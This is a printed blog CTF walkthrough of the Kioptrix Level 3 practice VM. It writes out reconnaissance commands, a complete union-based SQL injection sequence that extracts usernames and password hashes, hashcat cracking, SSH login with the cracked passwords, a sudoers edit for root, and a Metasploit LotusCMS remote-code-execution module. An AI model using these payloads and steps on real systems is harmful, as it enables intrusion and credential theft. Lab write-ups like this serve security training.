CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.

com/ctf-kioptrix-level-3-walkthrough/

 Wednesday, May 12, 2021 Advertise Contact us    

Chơi game v
Facebook Gaming trên m
ngay.

Facebook®

  

1 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

CTF CHALLENGES

CTF – Kioptrix Level 3 – Walkthrough Step By Step

 March 16, 2018  H4ck0  Comments Off

Kioptrix: Level 1.2 (Level 3) is the third VM of the Kioptrix series which can be found here. The kioptrix
VMs are intended for anyone who wants to start getting into pentesting or want to pursue the OSCP
exam.

Download Link – http://www.kioptrix.com/dlvm/KVM3.rar

Size – 452MB

Start your Kioptrix 1.2 Machine in your Vmware and run the netdiscover tool from your Kali Linux
machine.

2 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

You’ll get the complete list of all hosts attached to your network. So your Target IP of machine Kioptrix
is 192.168.36.131.

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it
to kioptrix3.com

There’s a web application involved, so to have everything nice and properly displayed you really need to
this.

Type the following command to edit the host file and add the following piece of code into it.

Command: gedit /etc/hosts

Once we open up and edit the hosts file, make sure it looks similar to below:

127.0.0.1 localhost
127.0.0.1 kali
192.168.36.131 kioptrix3.com

If you are using windows, then the host file path is C:\Windows\System32\drivers\etc\hosts.

3 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Let’s run Nmap to see what ports/services are open on running Kioptrix VM.

Command: nmap -sS -A -n 192.168.36.131

From above output, you can see that Only Port 80 and Port 22 are open. Port 80 is used by HTTP
Service with Apache 2.2.8 version and Port 22 is used by SSH with OpenSSH 4.7p1 version.

So let’s go ahead and browse to the website by entering the IP address of the machine in our browser
i.e. http://192.168.36.131/.

4 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

It seems to be a dynamic application running on Port 80 with one blog page and a login page.

Let’s start nikto to see if we can’t find any misconfigurations and vulnerabilities.

Command: nikto -h 192.168.36.131

Phpmyadmin was the first thing where we stucked by first look – used for DB Management located at
http://192.168.36.131/phpmyadmin/.

Later on what we’ll see with Phpmyadmin, let’s more explore the web application. So Under Blog page,
we found one more interesting link i.e. http://kioptrix3.com/gallery

5 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Click on “Ligoat Press Room”

After browsing that album page we saw that in one of the links we were able to sort the photos by
certain values.

6 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

The thing that really caught our eye here was the “id” parameter in the URL. So we attempted to inject
a single quote ( ‘ ) to try and see if the application was vulnerable to SQL Injection.

And YES! Its vulnerable to SQL Injection because it throws the error –

“You have an error in SQL syntax, check the manual that corresponds to your MySQL server version for
the right syntax to use near ” order by parentid, sort, name” at line 1 Could not select category”

There is a very good SQL Injection Tutorial that we suggest

you to read before exploiting this application, just so you
have a decent understanding of what we are doing.
Either way, we will try to explain the best we can as we go along.

So your first step is to find the number of columns. The easiest way to do this is writing “order by ”
column number and we add “- -” after the number. So we are going to inject a query for getting the
error. Now, what we do is arrange all the columns in order.

7 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Our links should look like that:

http://kioptrix3.com/gallery/gallery.php?id=1 order by 1– (No Error)

http://kioptrix3.com/gallery/gallery.php?id=1 order by 2– (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 3– (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 4– (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 5– (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 6– (No Error)
http://kioptrix3.com/gallery/gallery.php?id=1 order by 7– (Error – Unknown Column)

We will do this until it shows up in the unknown columns. If it shows the unknown column error on N,
that means it has the total number of Columns N-1 because it shows the content in order by N-1 so in
this case, the number of columns are 6.

Finding Accessible Columns

Now that we have the number of columns we need to get the column numbers that we can grab
information from. We can do that by adding a “–” before the “1” replacing the “order by #” with “union
all select” and columns number.

Our link should look like that: http://kioptrix2.com/gallery/gallery.php?id=-1 union all select
1,2,3,4,5,6–

We should get some numbers.

8 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Getting Database Version

We found that column 2 and 3 are vulnerable so we will use them to get the database version and
some other information like username etc. We can find other information by using a few things. One
thing every person should keep in mind is: The more information you have, the more powerful you will
be.

Let’s take column 3, so our link should look like that: http://kioptrix3.com/gallery/gallery.php?id=-1
union all select 1,@@version,database(),4,5,6–

In our case we got 5.0.51a-3ubuntu5.4 so we can continue to enumerate table names. If the version of
SQL is more than 5.0.0, it means it has the schema.

9 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Schema is just like an index of all databases.

Now we need to get the table name we want to access:

To do it we need to replace database() with group_concat(table_name) and add after the last columns
number from information_schema.tables where table_schema=database() and add the “–” in the
end .

Link should be like that: http://kioptrix.com/gallery/gallery.php?id=-1 union select

1,2,group_concat(table_name),4,5,6 from information_schema.tables where
table_schema=database()–

Nice! We now are able to see all the tables stored in the database! The dev_accounts looks really
promising, let’s go ahead and see if we can”t find out the columns contained in that table.

So our new URL is http://kioptrix3.com/gallery/gallery.php?id=-1 union select

1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE
table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)–

The CHAR() section in the SQL Query is actually the dev_accounts table name. This needs to be done
otherwise the SQL Query will fail.

Here we’ve converted the dev_accounts text into ASCII format with the help of “http://www.unit-
conversion.info/texttools/ascii/” website and added “table_name=char(100, 101, 118, 95, 97, 99, 99,
111, 117, 110, 116, 115)–” at the end of the URL.

10 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Our final attack is to get the data because we have table name, columns name, and database name.
Now we search for the columns named “username” and “password“.

Remove everything after the 1 and add: “from dev_accounts–” And replace
“group_concat(column_name)” with “group_concat(username,0x3a,password)“.

Here, 0x3a is the ASCII value of a ( : ) so we can separate the username from the password and our final
URL will be: http://kioptrix3.com/gallery/gallery.php?id=-1 union select
1,group_concat(username,0x3a,password),3,4,5,6 FROM dev_accounts–

And you’re done.

Alright! We got 2 Usernames and Passwords.

dreg:0d3eccfb887aabd50f243b3f155c0f85, loneferret:5badcaf789d3d1d09794d8f021f40f0e

11 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

You can also use a ready-made SQL Exploitation tool for breaking into DB called as SQLMAP.

Now next step is to crack the Hashes with the help of MD5 Decrypter.

For Hash 5badcaf789d3d1d09794d8f021f40f0e, the cracked hash is starwars

12 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

For 0d3eccfb887aabd50f243b3f155c0f85, the cracked hash is Mast3r

Furthermore, you can also use “hash-identifier” tool to verify the hash type whether its MD5, SHA1 or
any other.

To Crack the hash, you can also use hashcat tool which is pre-installed in Kali Linux machine.

Save both hash values in a text file named as “hash.txt“.

And run the following command to crack the hashes with HASHCAT.

13 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Command: hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt –force

Ok Nice! we got the real text behind these hashes.

Let’s SSH into the Kioptrix Machine with our newly found credentials with user loneferret.

Command: ssh [email protected]

Password: starwars

14 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Okay, at this point we need to escalate our privileges to root! we already did some initial
reconnaissance of the Kioptrix Machine via SSH and stumbled across the following.

The file CompanyPolicy.README seems to be interesting file, Let’s view the contents of this file with
the help of CAT command.

It seemed that the user we were currently logged in as had sudo permissions to the xterm-256color
text editor. Initially, we can attempt to edit the /etc/sudoers file so we can elevate our privileges – so
let’s do just that!

If for some reason you get an error when trying to run sudo ht then just export xtrem-color as a TERM
like we did below.

15 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

We should see the sudoers file open up like so.

From here press ALT+, then with your arrow keys navigate to Open, and then press Enter.

Once you press Open, you will be promoted to enter a file name. Type in /etc/sudoers to open the
sudoers file for editing.

16 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

After the file is open, let’s add /bin/sh right after /usr/local/bin/ht, and don’t forget the comma!

Once you did that press ALF+F > Save > then CTRL+Z to exit.

Okay, let’s see if our “exploit” worked!

Let’s back to PHPMYADMIN section, which we’ve found at http://192.168.36.131/phpmyadmin/

Try test as username and password field should be blank.

17 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

WOW! you logged in but it only shows information_schema database which is no use for us.

Now look at the Login page accessible at http://192.168.36.131/index.php?system=Admin and found

that it was using LotusCMS which is vulnerable to LotusCMS 3.0 eval() Remote Code Execution exploit.

Start the Metasploit Framework and use the following exploit:

18 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Command: use exploit/multi/http/lcms_php_exec

Type show options to view more details about this exploit module.

Set the required parameters as shown below:

And finally type run to start the exploit and Bingo! 1 Shell Session has been opened.

19 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Furthermore, type ls -l gallery to view all files in current working directory.

Here the interesting file is gconfig.php which seems to be a database configuration file having DB
username and DB password.

Let’s open this file by typing cat gallery/gconfig.php in same terminal.

20 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Ok we’ve got the DB details, let’s try to open it via PHPMYADMIN.

Now you’ve full access to the Database section through which you can add/manage/delete any user.

 Tagged ctf challeneges, ctf kioptrix level 3, ctf kioptrix level 3 walkthrough, ctf writeups, kioptrix series, kioptrix walkthrough,
vulnhub challenge, vulnhub writeups, vulnhun walkthrough

H4ck0

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical
hacking, seo tips and tricks, malware analysis and scanning.
https://www.yeahhub.com/

21 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

RELATED ARTICLES

CTF CHALLENGES CTF CHALLENGES CTF CHALLENGES

CTF – Kioptrix Level 2 – Crimemail CTF Writeup – CTF – Kioptrix Level 1 –

Walkthrough step by step Solution Walkthrough step by step
 March 14, 2018  H4ck0  April 9, 2018  H4ck0  March 13, 2018  H4ck0

 CTF – Kioptrix Level … DDOS a WiFi Network …

Search … Search

RECENT ARTICLES

 How to Install ACMarket App on Android to Download APK Files

 How to use AppCake to Install External IPA Files on iPhone

 How to use Nox Player to run Android Apps on Windows PC

 How to use TweakBox to Install Unofficial Apps on iOS

 How to Use TweakDoor to Install 3rd-Party iOS Apps on iPhone

 TheWiSpy [Tested] – Best Parental Control App for Kids

 Virtual Numbers: Why It’s The Next Big Thing In Every Industry

 How to Edit PDFs for Free with CocoDoc

 Surprising Things You Need to Know to Succeed As an Entrepreneur

 5 Benefits Of Working With An SEO Services Firm

22 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

23 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

24 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Snuggle up to H
Stress less. Sleep soundly.
Now 30% o�.

Headspace

Snuggle up to H
Stress less. Sleep soundly.
Now 30% o�.

Headspace

DISCLAIMER

25 of 26 5/13/2021, 4:30 PM
CTF – Kioptrix Level 3 – Walkthrough step by step - Yeah Hub https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

Yeahhub.com does not represent or endorse the accuracy or reliability of any information’s, content or advertisements
contained on, distributed through, or linked, downloaded or accessed from any of the services contained on this
website, nor the quality of any products, information’s or any other material displayed,purchased, or obtained by you
as a result of an advertisement or any other information’s or offer in or in connection with the services herein.

RECENT COMMENTS

 trool on SSLKILL – Forced Man in the Middle Attack – Sniff HTTPS/HTTP

 web root on Top 20 High Profile Creation Backlink Sites – 2018 Update

 daebak on How to Download Wistia Videos without any Tool

 Daniel on How to Download Wistia Videos without any Tool

LATEST ARTICLES

 How to Install ACMarket App on Android to Download APK Files

May 11, 2021

 How to use AppCake to Install External IPA Files on iPhone

May 11, 2021

 How to use Nox Player to run Android Apps on Windows PC

May 11, 2021

 How to use TweakBox to Install Unofficial Apps on iOS

May 11, 2021

Copyright &2021. All Rights Reserved

Advertise Privacy Policy Terms of use Cookie Policy Disclaimer Report a bug

26 of 26 5/13/2021, 4:30 PM